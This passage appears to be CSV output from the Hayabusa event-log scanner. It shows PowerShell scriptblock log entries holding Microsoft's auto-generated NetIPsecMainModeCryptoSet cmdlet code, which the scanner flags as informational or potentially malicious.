[Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPrese",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"nt} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeCryptoSet' -Alias '*' function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if 